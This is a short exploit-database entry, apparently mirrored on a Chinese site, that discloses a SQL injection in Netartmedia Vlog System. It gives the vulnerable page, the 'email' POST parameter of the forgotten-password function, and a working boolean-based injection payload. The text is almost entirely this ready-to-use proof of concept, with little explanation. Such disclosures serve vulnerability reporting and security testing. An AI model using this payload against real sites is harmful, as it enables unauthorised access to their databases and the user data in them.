Netartmedia Vlog System – ’email’ SQL Injection

• Exploit Database
• 12 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46583/

• # Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
  # Date: 20.03.2019
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://www.netartmedia.net/vlogsystem/
  # Demo Site: https://www.phpscriptdemos.com/vlogs/
  # Version: Lastest
  # Tested on: Kali Linux
  # CVE: N/A
  ----- PoC: SQLi -----
  # Request: http://localhost/[PATH]/index.php
  # Vulnerable Parameter: email (POST)
  # Attack
  Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password